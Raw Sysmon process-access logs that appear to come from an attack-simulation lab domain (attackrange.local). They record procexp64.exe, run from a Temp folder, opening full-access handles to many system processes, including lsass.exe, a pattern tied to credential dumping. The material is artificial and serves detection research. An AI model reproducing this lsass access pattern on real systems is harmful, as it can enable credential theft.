15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790536Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790535Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790534Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790533Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790532Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790531Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790530Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790529Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790528Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790527Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790526Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790525Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790524Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790523Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790522Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790521Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790520Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790519Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:44.439{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790644Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790643Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790642Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790641Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790640Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790639Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790638Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790637Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790636Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790635Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790634Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790633Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790632Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790631Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790630Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790629Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790628Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790627Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:45.454{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790626Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 